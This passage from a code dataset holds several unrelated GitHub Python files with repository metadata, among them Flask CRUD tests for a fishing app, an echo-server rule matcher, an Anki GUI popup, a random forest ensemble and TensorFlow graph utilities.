id=1)\n\t\t\t,follow_redirects = True\n\t\t)\n\t\tself.assertEqual(response.status_code,200)\n\t\t\nclass TestRead(TestBase):\n\n# read the database to ensure that the fish is present by looking for test_fish (it is present within the catch too)\n\tdef test_read_fish(self):\n\t\tresponse = self.client.get(url_for('home'))\n\t\tself.assertIn(b\"test fish\", response.data)\n\n# read the database to ensure that the catch has been entered, since the fish table should only be storing 1800 and 2500, the 2030\n# can only be present in the catch table.\n\tdef test_read_catch(self):\n\t\tresponse = self.client.get(url_for('home'))\n\t\tself.assertIn(b\"2030\", response.data)\n\nclass TestCreate(TestBase):\n\n# Create a catch and search for the information on the home page, the catch description is only present in the Catches table.\n\tdef test_create_catch(self):\n\t\tresponse = self.client.post(\n\t\t\turl_for('create'),\n\t\t\tdata=dict(fishname=\"test fish\", fishweight=2000, description=\"Blimey What a catch\"),\n\t\t\tfollow_redirects = True\n\t\t)\n\t\tself.assertIn(b\"Blimey What a catch\", response.data)\n\n\n# Ensure that the database is correctly updating when the fish min weight and max weight values are eclipsed by new values, tried to use python logic to test routes, couldn't quite figure it out\n# but the tests here show that the code within routes.py is in fact working.\n\n\tdef test_create_sbcatch(self):\n\n\t\tresponse = self.client.post(\n\t\t\turl_for('create'),\n\t\t\tdata=dict(fishname=\"test fish\", fishweight=2000, description=\"Blimey What a catch\"),\n\t\t\tfollow_redirects = True\n\t\t)\n\t\tfish = Fish(name=\"carp\", minweight=4, maxweight=505)\n\t\tdb.session.add(fish)\n\t\tdb.session.commit()\n\t\tnew_catch = Catches(fishid=fish.id,fishname=\"carp\", fishweight=2, description=\"heaviest catch yet!\")\n\t\tdb.session.add(new_catch)\n\t\tdb.session.commit()\n\t\tif fish.minweight > new_catch.fishweight:\n\t\t\tfish.minweight = new_catch.fishweight\n\t\t\tdb.session.commit()\n\t\tself.assertTrue(fish.minweight == new_catch.fishweight)\n\t\nclass TestUpdate(TestBase):\n# Update catch description from previous value to new value, search for new value on home page.\n\n\tdef test_update_catch(self):\n\t\tresponse = self.client.post(\n\t\t\turl_for('update', id=1),\n\t\t\tdata=dict(fishname=\"test fish\", fishweight=2000, description=\"That catch was easy!\"),\n\t\t\tfollow_redirects = True \n\t\t)\n\t\tself.assertIn(b\"That catch was easy!\", response.data)\n\nclass TestDelete(TestBase):\n\n# Delete the catch and ensure that the data from the catch is no longer present on the home page, and as a result no longer\n# present on the home page.\n\n\tdef test_delete_catch(self):\n\t\tresponse = self.client.get(\n\t\t\turl_for('delete', id=1),\n\t\t\tfollow_redirects = True \n\t\t)\n\t\tself.assertNotIn(b\"Jeeez what a catch\", response.data)\n\n","repo_name":"Bkirkb/QA-Fundamental","sub_path":"Program/tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"27474095612","text":"class results:\n physics=0\n chemistry=0\n maths=0\nshafeeq=results()\nadam=results()\n\nshafeeq.physics=98\nshafeeq.chemistry=78\nshafeeq.maths=99\n\nadam.physics=34\nadam .chemistry=97\nadam.maths=102\ntotal1 = shafeeq.physics + shafeeq.chemistry + shafeeq.maths\ntotal2 = adam.physics + adam.chemistry + adam.maths\n\nprint(\"shafeeq's results:\",total1)\nprint(\"adam's results:\",total2)\n\ntotal1= shafeeq.physics\n\n\n\n\n","repo_name":"adatia111/pythonProject","sub_path":"objects1.py","file_name":"objects1.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"7952754855","text":"from mapsys import *\nimport matplotlib.pyplot as plt\nfrom optparse import OptionParser\nimport numpy as np\nimport csv\n\n\nclass Vessel:\n time = []\n x = []\n y = []\n z = []\n phi = []\n the = []\n psi = []\n out = []\n\n\ndef get_vessel_column_index(name,out_chanel):\n index = [0,0,0,0,0,0,0]\n fp = open(name) \n for i,line in enumerate(fp):\n if i==6:\n words = line.split()\n for j in range(0,len(words)):\n if words[j]=='PtfmTDxi':\n index[0] = j;\n if words[j]=='PtfmTDyi':\n index[1] = j;\n if words[j]=='PtfmTDzi':\n index[2] = j;\n if words[j]=='PtfmRDxi':\n index[3] = j;\n if words[j]=='PtfmRDyi':\n index[4] = j;\n if words[j]=='PtfmRDzi':\n index[5] = j;\n if words[j]==out_chanel:\n index[6] = j;\n fp.close()\n return index\n\n\ndef set_vessel_prescribed_motion(table,index):\n vessel = Vessel()\n N = 1000#len(table)\n vessel.time = [float(table[i][0]) for i in range(8,N)]\n vessel.x = [float(table[i][index[0]]) for i in range(8,N)]\n vessel.y = [float(table[i][index[1]]) for i in range(8,N)]\n vessel.z = [float(table[i][index[2]]) for i in range(8,N)]\n vessel.phi = [float(table[i][index[3]]) for i in range(8,N)]\n vessel.the = [float(table[i][index[4]]) for i in range(8,N)]\n vessel.psi = [float(table[i][index[5]]) for i in range(8,N)] \n vessel.out = [float(table[i][index[6]]) for i in range(8,N)] \n return vessel\n\n\n\n","repo_name":"hfchen20/foamMooring","sub_path":"map-plus-plus/python_driver/fast_driver_support.py","file_name":"fast_driver_support.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"}
+{"seq_id":"17487893063","text":"from flask import request\n\nimport re\nimport typing\n\n\nclass Rule(typing.NamedTuple):\n\n rule_source: str # \"\" if directly from _echo_response, or name of file otherwise\n after: int # eg: 200, represents number of milliseconds after start/reset of echo server\n selector_type: str # one of { PATH, HEADER, PARAM, JSON, BODY }\n selector_target: str # name of header, parameter, or json field\n pattern: str # eg: /test/ or /Test/i or !/test/\n status_code: int # eg: 200\n delay: int # eg: 200, represents number of milliseconds to delay\n location: list # list of values, each one of { file, text }\n headers: list # [ {},... ]\n values: list # [ [...],... 
]\n\n def unique_id(self, request_path):\n after = str(self.after or 0)\n selector_type = \"\" if self.selector_type is None else self.selector_type\n selector_target = \"\" if self.selector_target is None else self.selector_target\n pattern = \"\" if self.pattern is None else self.pattern\n return \":\".join((request_path, self.rule_source, selector_type, selector_target, pattern, after))\n\n def rule4location(self, location, headers, values):\n return Rule(\n self.rule_source,\n self.after,\n self.selector_type,\n self.selector_target,\n self.pattern,\n self.status_code,\n self.delay,\n location,\n headers,\n values,\n )\n\n def at_offset(self, offset):\n locations = self.location[offset]\n values = self.values[offset]\n\n rules = []\n while locations and locations[0] == \"file\":\n headers = self.headers[offset]\n rule = self.rule4location(locations.pop(0), headers, values.pop(0))\n rules.append(rule)\n\n if values:\n headers = self.headers[offset]\n rule = self.rule4location(locations.pop(0), headers, values)\n rules.append(rule)\n\n return rules\n\n def _text(self, headers, params, json):\n value = None\n\n if self.selector_type == \"HEADER\":\n header_name = self.selector_target\n value = headers.get(header_name, \"\")\n\n elif self.selector_type == \"PATH\":\n value = request.path\n\n elif self.selector_type == \"PARAM\":\n param_name = self.selector_target\n value = params.get(param_name, \"\")\n\n elif self.selector_type == \"JSON\":\n json_path = self.selector_target\n fmt = \"{json.\" + json_path + \"}\"\n value = fmt.format(json=json)\n\n elif self.selector_type == \"BODY\":\n body = request.get_data().decode()\n value = body\n\n return value\n\n def _matches(self, text):\n # set case-sensitive flag\n flags = 0\n if self.pattern[-1] == \"i\":\n flags = re.IGNORECASE\n\n # determine match polarity\n is_positive = True\n if self.pattern[0] == \"!\":\n is_positive = False\n\n # parse pattern text from pattern spec, eg: parse \"dog\" from \"!/dog/i\"\n pattern = re.sub(r\".*/(.*)/.*\", r\"\\1\", self.pattern)\n\n got_match = False\n text_match = re.search(pattern, text, flags)\n if is_positive and text_match:\n got_match = True\n elif not is_positive and not text_match:\n got_match = True\n\n return got_match\n\n def apply(self, headers, params, json, millis_since_reset):\n if self.selector_type is None:\n value = True\n else:\n text = self._text(headers, params, json)\n value = self._matches(text)\n\n if millis_since_reset <= int(self.after or 0):\n value = False\n\n return value\n\n","repo_name":"psamuels00/echo-api","sub_path":"src/echoapi/rule.py","file_name":"rule.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10821171787","text":"import os\nimport cv2\n\nimport numpy as np\nfrom naturalnets.environments.anki.constants import IMAGES_PATH\nfrom naturalnets.environments.anki.pages.name_exists_popup import NameExistsPopup\nfrom naturalnets.environments.anki.pages.profile_page_popups.five_profiles_popup import FiveProfilesPopup\nfrom naturalnets.environments.anki.profile import ProfileDatabase\nfrom naturalnets.environments.app_components.bounding_box import BoundingBox\nfrom naturalnets.environments.app_components.page import Page\nfrom naturalnets.environments.app_components.reward_element import RewardElement\nfrom naturalnets.environments.app_components.utils import put_text, render_onto_bb\nfrom naturalnets.environments.app_components.widgets.button import 
Button\n\n\nclass AddProfilePopup(Page, RewardElement):\n \"\"\"\n Adds a new profile to the present profiles\n State description:\n state[0]: if this popup is open\n state[i]: if the text field is filled with name[i] as name = {Alice, Bob, Carol, Dennis, Eva}\n \"\"\"\n STATE_LEN = 6\n IMG_PATH = os.path.join(IMAGES_PATH, \"add_profile_popup.png\")\n\n WINDOW_BB = BoundingBox(160, 305, 498, 109)\n OK_BB = BoundingBox(451, 381, 82, 24)\n TEXT_BB = BoundingBox(566, 345, 86, 20)\n CANCEL_BB = BoundingBox(549, 381, 101, 24)\n TEXT_X = 191\n TEXT_Y = 359\n\n def __init__(self):\n Page.__init__(self, self.STATE_LEN, self.WINDOW_BB, self.IMG_PATH)\n RewardElement.__init__(self)\n # Popups warning that the profile cannot be created\n self.name_exists_popup = NameExistsPopup()\n self.five_profiles_popup = FiveProfilesPopup()\n # Contains the current profiles\n self.profile_database = ProfileDatabase()\n self.add_child(self.name_exists_popup)\n self.add_child(self.five_profiles_popup)\n self.profile_iterate_index = 0\n\n self.current_field_string = None\n\n self.text_button: Button = Button(\n self.TEXT_BB, self.set_current_field_string)\n self.ok_button: Button = Button(self.OK_BB, self.add_profile)\n self.cancel_button: Button = Button(self.CANCEL_BB, self.close)\n\n self.add_children([self.name_exists_popup, self.five_profiles_popup])\n self.set_reward_children(\n [self.name_exists_popup, self.five_profiles_popup])\n\n \"\"\"\n Provide reward for opening/closing this popup, setting a profile name and adding profile\n \"\"\"\n @property\n def reward_template(self):\n return {\n \"window\": [\"open\", \"close\"],\n \"profile_name_clipboard\": 0,\n \"add_profile\": 0\n }\n\n \"\"\"\n Delegate click to the popup if one is open else handle click with the buttons.\n \"\"\"\n\n def handle_click(self, click_position: np.ndarray) -> None:\n if self.name_exists_popup.is_open():\n self.name_exists_popup.handle_click(click_position)\n return\n if self.five_profiles_popup.is_open():\n self.five_profiles_popup.handle_click(click_position)\n return\n if self.text_button.is_clicked_by(click_position):\n self.text_button.handle_click(click_position)\n elif self.ok_button.is_clicked_by(click_position):\n self.ok_button.handle_click(click_position)\n elif self.cancel_button.is_clicked_by(click_position):\n self.cancel_button.handle_click(click_position)\n\n \"\"\"\n Close this popup\n \"\"\"\n\n def close(self):\n self.get_state()[0:6] = 0\n self.register_selected_reward([\"window\", \"close\"])\n for child in self.get_children():\n child.close()\n self.current_field_string = None\n\n \"\"\"\n Open this popup\n \"\"\"\n\n def open(self):\n self.get_state()[0] = 1\n self.get_state()[1:6] = 0\n self.register_selected_reward([\"window\", \"open\"])\n\n \"\"\"\n Set the current string by selecting a name from the predefined set of names\n \"\"\"\n\n def set_current_field_string(self):\n self.register_selected_reward([\"profile_name_clipboard\"])\n self.current_field_string = self.profile_database.get_profile_names()[\n self.profile_iterate_index]\n self.get_state()[1 + (self.profile_iterate_index - 1) % 5] = 0\n self.profile_iterate_index += 1\n self.profile_iterate_index %= 5\n self.get_state()[1 + (self.profile_iterate_index - 1) % 5] = 1\n\n \"\"\"\n Adds the profile if the current_field_string is set and the max number of decks is not exceeded\n and the name of the profile is not present\n \"\"\"\n\n def add_profile(self):\n if self.current_field_string is None:\n return\n elif not 
(self.profile_database.is_adding_allowed()):\n self.five_profiles_popup.open()\n elif self.profile_database.is_included(self.current_field_string):\n self.name_exists_popup.open()\n else:\n self.profile_database.create_profile(self.current_field_string)\n self.current_field_string = None\n self.register_selected_reward([\"add_profile\"])\n self.close()\n\n \"\"\"\n Renders the image of this popup\n \"\"\"\n\n def render(self, img: np.ndarray):\n to_render = cv2.imread(self._img_path)\n img = render_onto_bb(img, self.get_bb(), to_render)\n put_text(img, \"\" if self.current_field_string is None else self.current_field_string,\n (self.TEXT_X, self.TEXT_Y), font_scale=0.5)\n if self.five_profiles_popup.is_open():\n img = self.five_profiles_popup.render(img)\n if self.name_exists_popup.is_open():\n img = self.name_exists_popup.render(img)\n return img\n \"\"\"\n Returns true if the popup is open\n \"\"\"\n\n def is_open(self) -> int:\n return self.get_state()[0]\n\n def reset_iterate_index(self):\n self.profile_iterate_index = 0\n","repo_name":"neuroevolution-ai/NaturalNets","sub_path":"naturalnets/environments/anki/pages/profile_page_popups/add_profile_popup.py","file_name":"add_profile_popup.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"}
+{"seq_id":"38597094970","text":"import random\nfrom sheap_simplified import SoftHeap\n\ndef randlist(n):\n\treturn [ random.random() for i in range(n) ]\n\ndef randperm(n):\n\treturn random.sample(list(range(n)),n)\n\ndef build(lst, eps):\n\tP = SoftHeap(eps)\n\tfor it in lst:\n\t\tP.insert(it)\n\treturn P\n\ndef extract(P):\n\tlst = [];\n\twhile P.heap != SoftHeap.null:\n\t\tlst.append(P.find_min()[0].key)\n\t\tP.delete_min()\n\treturn lst\n\t\t\ndef sort(lst, eps):\n\tprint(lst)\n\tP = build(lst, eps)\n\tlst1 = extract(P)\n\tif P.eps == 0:\n\t\tfor i in range(1,len(lst)):\n\t\t\tif lst1[i]\",end=\" \")\n for i in graph[s]:\n if i not in visited:\n queue.append(i)\n visited.add(i)\n print(visited)\n\naddEdge(0, 1)\naddEdge(0, 2)\naddEdge(0, 3)\naddEdge(1, 0)\n\naddEdge(2, 0)\n\naddEdge(3, 0)\naddEdge(3, 4)\naddEdge(4, 3)\n\n# addEdge(1,2)\n# addEdge(1,3)\n# addEdge(2,4)\n# addEdge(2,5)\n# addEdge(3,1)\n# addEdge(3,5)\n# addEdge(4,2)\n# addEdge(4,5)\n# addEdge(4,6)\n# addEdge(5,2)\n# addEdge(5,3)\n# addEdge(5,4)\n# addEdge(6,4)\n# addEdge(6,5)\nprint(len(graph))\nprint(graph)\n\nBFS(0)","repo_name":"anurag1009/leetcode","sub_path":"coding/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"11769380773","text":"import numpy as np\nimport scipy.stats as stat\nfrom tqdm import tqdm\nfrom utils.resampling import Bootstrap\nfrom Trees.DecisionTree import DecisionTree\n\n\nclass Ensamble():\n \"\"\"\n Class Ensambel learning Object\n currently a bootstrap learning\n using utils.resampling.Bootstrap().__iter__()\n Args:\n models: list of estimators\n random_state:\n\n \"\"\"\n\n def __init__(self, models,random_state):\n self.models = models\n self.n_estimator = len(self.models)\n self.random_state = random_state\n\n def fit(self, X, y):\n self.resample_generator = Bootstrap(X,y,self.n_estimator, self.random_state)\n for model, (Xi, yi) in tqdm(zip(self.models, self.resample_generator),total = self.n_estimator):\n model.fit(Xi, yi)\n\n def predict(self,X):\n \"\"\"\n hard voting\n soft to be updated...\n \"\"\"\n preds = [model.predict(X) for 
model in self.models]\n preds = stat.mode(preds,axis=0)[0][0]\n return preds\n\n\n\nclass RandomForest(Ensamble):\n def __init__(self, max_depth = 2, n_estimator = 3, max_features=0.5 ,random_state = None):\n self.max_depth = max_depth\n self.n_estimator = n_estimator\n self.max_features = max_features\n self.random_state = random_state\n self.models = [DecisionTree(max_depth = max_depth,\n max_features= max_features,\n splitter = 'quantile') for _ in range(n_estimator)]\n super().__init__(self.models, random_state)\n","repo_name":"AllenLeong/PracticeMLfromScratch","sub_path":"Trees/Ensamble.py","file_name":"Ensamble.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5684684166","text":"import collections\nimport copy\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport multiprocessing\nimport functools\nfrom abc import ABC, abstractmethod\n\nfrom rl.tools.utils.misc_utils import unflatten, flatten, cprint\n\ntf_float = tf.float32\ntf_int = tf.int32\n\n\n\"\"\"\nFor compatibility with stop_gradient\n\"\"\"\n\n\ndef gradients(tensor, var_list):\n grads = tf.gradients(tensor, var_list)\n return [grad if grad is not None else tf.zeros_like(var)\n for var, grad in zip(var_list, grads)]\n\n\n\"\"\"\nWrapper of tensorflow graphs\n\"\"\"\n\n\nclass tfObjectManager(object):\n \"\"\"\n An object manager that makes sure each one has an unique name.\n \"\"\"\n\n def __init__(self, default_name='tfObject'):\n self._name = default_name\n self._dict = collections.defaultdict(lambda: None)\n self._table = collections.defaultdict(lambda: False)\n\n def get_name(self, name=None):\n \"\"\" automatically get a unique name for the constructing a tfObject instance \"\"\"\n if name is None:\n name = self._name\n name = str(name)\n valid_name = False\n while not valid_name:\n # propose a new name\n ind = self._dict[name]\n if ind is None:\n new_name = str(name)\n self._dict[name] = 1\n else:\n new_name = str(name) + '_' + str(ind)\n self._dict[name] += 1\n # check if the proposed name exists\n if not self._table[new_name]:\n self._table[new_name] = True\n valid_name = True\n if name != new_name:\n cprint('An tfObject under {} already exists. A new name {} is created by tfObjectManager'.format(name, new_name))\n return new_name\n\n\n# This makes sure every tfObject instance has an unique name\n_tfOBJECT_MANAGER = tfObjectManager()\n\n\nclass tfObject(ABC):\n \"\"\"\n A helper class for defining custom classes based on tensorflow.\n\n It makes sure that each instance of tfObject has an unique name (realized\n as tf.variable_scope) and support basic functionalities, like\n copy.deepcopy, assign, save, and restore.\n\n Usage guideilnes:\n\n The user needs to define _build_graph and use tfObject.save_init_args\n to decorate its __init__. Note stateful non-tensorflow attributes\n (which change during the use of the instance, like a counter) should be\n NOT created inside _build_graph. The decorator tfObject.save_init_args\n is used to record input arguments to __init__ for deepcopying. 
It\n should be used to decorate a child class's __init__ when its signature\n or default value changes.\n\n In order to maintain desired deepcopy behaviors during inheritance, the\n vuser should modify _pre_deepcopy_list and _post_deepcopy_list methods\n to to add the name of attributes that should be copied during deepcopy.\n By default, an tfObject instance does not deepcopy any attribute,\n except for those provided by the user. This convention is chosen for\n robust behvaiors in case of potential furture behavior changes of\n tensorflow. When copy.deepcopy is called, tfObject calls the __init__\n function defined by the custom class, in which before _build_graph is\n called (through __init__ of tfObject) the attributes in\n _pre_deepcopy_list will be deepcopied, and then deepcopies the\n attributes in the _post_deepcopy_list. As a rule of thumb,\n _pre_deepcopy_list should contain stateful attributes that pertain to\n the tensorflow graph creation (i.e. those created before calling\n __init__ ) _post_deepcopy_list contains other stateful attributes.\n\n Note when defining _pre_deepcopy and _post_deepcopy_list, make sure it\n contains the contents from the parent class.\n\n Public attributes:\n ts_vars, ts_allvars\n\n Public methods:\n copy, __deepcopy__, assign, save, restore\n \"\"\"\n\n def __init__(self, name='tfObject', max_to_keep=None, bg_kwargs=None):\n \"\"\"\n The tensorflow graph constructor.\n\n Args:\n name: the name of the object\n max_to_keep: the maximal number of copies to save\n bg_kwargs: the additional kwargs of _build_graph.\n \"\"\"\n\n assert hasattr(self, '_tfObject__args') and hasattr(self, '_tfObject__kwargs'), \\\n 'Must use save_init_args decorator on __init__'\n if bg_kwargs is None:\n bg_kwargs = {}\n\n # pre-processing\n if hasattr(self, '_tfObject__pre_init_fun'):\n self._tfObject__pre_init_fun()\n if hasattr(self, '_tfObject__default_name'):\n name = self._tfObject__default_name # force using a default name\n\n # create the tensorflow graph\n self.__name = _tfOBJECT_MANAGER.get_name(name) # get a unique name\n with tf.variable_scope(self._tfObject__name):\n self.__scope = tf.get_variable_scope().name # for later tensors retrieval\n self._build_graph(**bg_kwargs)\n # build getters and setters (np.ndarray)\n if len(self.ts_vars) > 0:\n self.__get_vars = build_get(self.ts_vars)\n self.__set_vars = build_set(self.ts_vars)\n if len(self.ts_allvars) > 0:\n self.__get_allvars = build_get(self.ts_allvars)\n self.__set_allvars = build_set(self.ts_allvars)\n if len(self.ts_allvars) > 0:\n self._saver = tf.train.Saver(self.ts_allvars, max_to_keep=max_to_keep)\n\n # for deepcopy\n self.__pre_deepcopy_list = [] # attributes should be deep copied\n self.__pre_deepcopy_list.extend(self._pre_deepcopy_list)\n self.__post_deepcopy_list = ['_scope'] # attributes should be deep copied\n self.__post_deepcopy_list.extend(self._post_deepcopy_list)\n\n # Some functions for the user to define\n @abstractmethod\n def _build_graph(self, **kwargs):\n \"\"\" Build the tensorflow graph \"\"\"\n\n @property\n def _pre_deepcopy_list(self):\n \"\"\" Return a list of strings of attribute names that should be deep\n copied before calling tfObject.__init__ \"\"\"\n return []\n\n @property\n def _post_deepcopy_list(self):\n \"\"\" Return a list of strings of attribute names that should be deep\n copied before calling self.__init__ \"\"\"\n return []\n\n # Functions for correct deepcopy\n @staticmethod\n def save_init_args(deepcopy_args=False):\n \"\"\" A decorator for child class's 
__init__, which saves the input\n arguments for performing deepcopying\"\"\"\n if deepcopy_args: # whether to deepcopy the input arguments\n def safe_copy(val):\n try:\n return copy.deepcopy(val)\n except:\n return copy.copy(val)\n else:\n def safe_copy(val): return val\n\n def decorator(fun):\n @functools.wraps(fun)\n def wrapper(self, *args, **kwargs):\n if hasattr(self, '_tfObject__args_saved'):\n if self._tfObject__args_saved: # make sure it's only called once\n return fun(self, *args, **kwargs)\n\n # save the input arguments\n self.__args, self.__kwargs = [], {}\n self.__args = [safe_copy(arg) for arg in args]\n self.__kwargs = {k: safe_copy(v) for k, v in kwargs.items()}\n self.__args_saved = True\n\n return fun(self, *args, **kwargs)\n return wrapper\n return decorator\n\n def copy(self, new_name):\n \"\"\" Like copy.deepcopy but with a new custom name \"\"\"\n return self.__deepcopy(name=new_name, memo={})\n\n def __deepcopy__(self, memo):\n # we need to overload this because of tensorflow graph\n return self._tfObject__deepcopy(memo=memo)\n\n def __deepcopy(self, memo, name=None):\n # create new instance\n tfobj = type(self).__new__(type(self), *self._tfObject__args, **self._tfObject__kwargs)\n\n memo[id(self)] = tfobj # prevent forming a loop\n # customize the behavior of tfObject.__init__\n if name is not None:\n tfobj.__default_name = name # use a new name\n\n def _pre_deepcopy(): # deepcopy attributes before _build_graph\n tfobj._tfObject__update_attrs(self, self._tfObject__pre_deepcopy_list, memo)\n tfobj.__pre_init_fun = _pre_deepcopy\n # initialize the instance as usual\n tfobj.__init__(*self._tfObject__args, **self._tfObject__kwargs)\n # post deepcopying\n tfobj._tfObject__update_attrs(self, self._tfObject__post_deepcopy_list, memo)\n # update tf.Variables\n tfobj.assign(self)\n return tfobj\n\n def __update_attrs(self, src, attrs, memo):\n # try to deepcopy attrs from src to self\n for k in list(set(attrs) & set(src.__dict__.keys())):\n setattr(self, k, copy.deepcopy(getattr(src, k), memo))\n\n # Miscellaneous functions\n def assign(self, other):\n \"\"\"Set the tf.Variables of self as that of the other \"\"\"\n assert type(self) == type(other)\n if len(self.ts_allvars) > 0:\n self._tfObject__set_allvars(*other._tfObject__get_allvars()) # update tf.Variables\n\n @property\n def ts_vars(self): # list of trainable tf.Variables\n return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._tfObject__scope)\n\n @ts_vars.setter\n def ts_vars(self, vals): # list of values to set to trainable tf.Variables\n self._tfObject__set_vars(*vals)\n\n @property\n def ts_allvars(self): # list of all tf.Variables, including non-trainable ones\n return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self._tfObject__scope)\n\n @ts_allvars.setter\n def ts_allvars(self, vals): # list of all tf.Variables, including non-trainable ones\n self._tfObject__set_allvars(*vals)\n\n def save(self, path):\n \"\"\" Save the ts_allvars to path \"\"\"\n if len(self.ts_allvars) > 0:\n path = self._tfObject__saver.save(tf.get_default_session(), path)\n return path\n\n def restore(self, path, saved_name=None):\n \"\"\"Recover ts_allvars from path saved with saved_name\"\"\"\n if len(self.ts_allvars) > 0:\n if saved_name is None:\n saved_name = self._tfObject__name\n ts_dict = {}\n for ts in self.ts_allvars:\n splits = ts.name.split('/')\n splits[0] = saved_name\n saved_ts_name = '/'.join(splits)\n assert saved_ts_name.split(':')[1] == '0'\n saved_ts_name = saved_ts_name.split(':')[0]\n 
ts_dict[saved_ts_name] = ts\n saver = tf.train.Saver(ts_dict)\n saver.restore(tf.get_default_session(), path)\n\n\n\"\"\"\nSession management.\n\"\"\"\n\n\ndef make_session(num_cpu=None, make_default=False):\n \"\"\"Returns a session that will use CPU's only\"\"\"\n if num_cpu is None:\n num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))\n tf_config = tf.ConfigProto(\n inter_op_parallelism_threads=num_cpu,\n intra_op_parallelism_threads=num_cpu)\n tf_config.gpu_options.allocator_type = 'BFC'\n tf_config.gpu_options.allow_growth = True\n if make_default:\n return tf.InteractiveSession(config=tf_config)\n else:\n return tf.Session(config=tf_config)\n\n\ndef single_threaded_session():\n \"\"\"Returns a session which will only use a single CPU\"\"\"\n return make_session(num_cpu=1)\n\n\n\"\"\"\nPlaceholder cache. Create if necessary.\n\"\"\"\n_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)\n\n\ndef get_placeholder(name, dtype=None, shape=None):\n if name in _PLACEHOLDER_CACHE:\n assert dtype is None\n assert shape is None\n return _PLACEHOLDER_CACHE[name][0]\n else:\n out = tf.placeholder(dtype=dtype, shape=shape, name=name)\n _PLACEHOLDER_CACHE[name] = (out, dtype, shape)\n return out\n\n\n\"\"\"\nSimple functions that construct tensors from tensors.\n\"\"\"\n\n\ndef squared_sum(sy_x, axis=None):\n sy_x_sqr = tf.square(sy_x)\n return tf.reduce_sum(sy_x_sqr, axis=axis)\n\n\ndef switch(condition, then_expression, else_expression):\n \"\"\"Switches between two operations depending on a scalar value (int or bool).\n Note that both `then_expression` and `else_expression`\n should be symbolic tensors of the *same shape*.\n\n Args:\n condition: scalar tensor.\n then_expression: TensorFlow operation.\n else_expression: TensorFlow operation.\n \"\"\"\n sy_x_shape = copy.copy(then_expression.get_shape())\n sy_x = tf.cond(tf.cast(condition, 'bool'),\n lambda: then_expression,\n lambda: else_expression)\n sy_x.set_shape(sy_x_shape)\n return sy_x\n\n\ndef build_multilayer_perceptron(\n scope,\n sy_input,\n output_size,\n n_layers=2,\n size=64,\n activation=tf.tanh,\n hid_layer_std=1.0,\n output_activation=None,\n output_init_std=1.0,\n):\n\n with tf.variable_scope(scope):\n sy_y = sy_input\n for _ in range(n_layers):\n sy_y = tf.layers.dense(sy_y, size, activation=activation,\n kernel_initializer=normc_initializer(hid_layer_std))\n sy_y = tf.layers.dense(sy_y, output_size, activation=output_activation,\n kernel_initializer=normc_initializer(output_init_std))\n return sy_y\n\n\ndef normc_initializer(std=1.0):\n def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613\n out = np.random.randn(*shape).astype(np.float32)\n out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))\n return tf.constant(out)\n return _initializer\n\n\ndef build_get(tensors):\n return function([], tensors)\n\n\ndef build_set(tensors):\n def get_ph(x, name=None):\n if type(x) is not list:\n return [tf.placeholder(shape=x.shape, dtype=x.dtype)]\n else:\n return [tf.placeholder(shape=v.shape, dtype=v.dtype) for v in x]\n phs = get_ph(tensors)\n assign_ops = [tf.assign(t, p) for (t, p) in zip(tensors, phs)]\n set_fun = function(phs, [], assign_ops)\n return set_fun\n\n\n\"\"\"\nConvert from flat tensors to list of tensors and back.\n\"\"\"\n\n\"\"\"\nShape related.\n\"\"\"\n\n\ndef get_shape(x):\n return x.get_shape().as_list()\n\n\ndef intprod(shape):\n return int(np.prod(shape))\n\n\ndef get_size(x):\n shape = get_shape(x)\n assert all(isinstance(a, int) for a in 
shape), \"shape function assumes that shape is fully known\"\n return intprod(shape)\n\n\ndef get_tensor_by_name(name):\n return tf.get_default_graph().get_tensor_by_name('{}:0'.format(name))\n\n\nclass SetFromFlat(object):\n def __init__(self, var_list, dtype=tf.float32):\n assigns = []\n shapes = list(map(get_shape, var_list))\n total_size = np.sum([intprod(shape) for shape in shapes])\n\n self.theta = theta = tf.placeholder(dtype, [total_size])\n start = 0\n assigns = []\n for (shape, v) in zip(shapes, var_list):\n size = intprod(shape)\n assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))\n start += size\n self.op = tf.group(*assigns)\n\n def __call__(self, theta):\n tf.get_default_session().run(self.op, feed_dict={self.theta: theta})\n\n\nclass GetFlat(object):\n def __init__(self, var_list):\n self.op = tf.concat(axis=0, values=[tf.reshape(v, [get_size(v)]) for v in var_list])\n\n def __call__(self):\n return tf.get_default_session().run(self.op)\n\n\nclass Shaper(object):\n \"\"\"\n A wrapper of a list of tf.Tensors for convenient conversions between a\n list of tensors and its flat counterpart based on contiguous memory\n allocation.\n\n It creates tensorflow operators only when necessary.\n \"\"\"\n\n def __init__(self, tensors):\n # tensors: a list of tensors.\n self._tensors = tensors\n\n @property\n def _tensor_shapes(self):\n return [t.shape.as_list() for t in self._tensors]\n\n # for np.ndarray\n def unflatten(self, val):\n return unflatten(val, shapes=self._tensor_shapes)\n\n def flatten(self, vs):\n return flatten(vs)\n\n def build_flat_ph(self):\n \"\"\" Create return a single placeholder of the size as the number of\n elements in self.tensors. Return the placeholder and a list of\n tf.Tensors view of the created placeholder in accordinance with the\n structure of self.tensors. \"\"\"\n\n total_size = sum([intprod(shape) for shape in self._tensor_shapes])\n ph = tf.placeholder(dtype=tf.float32, 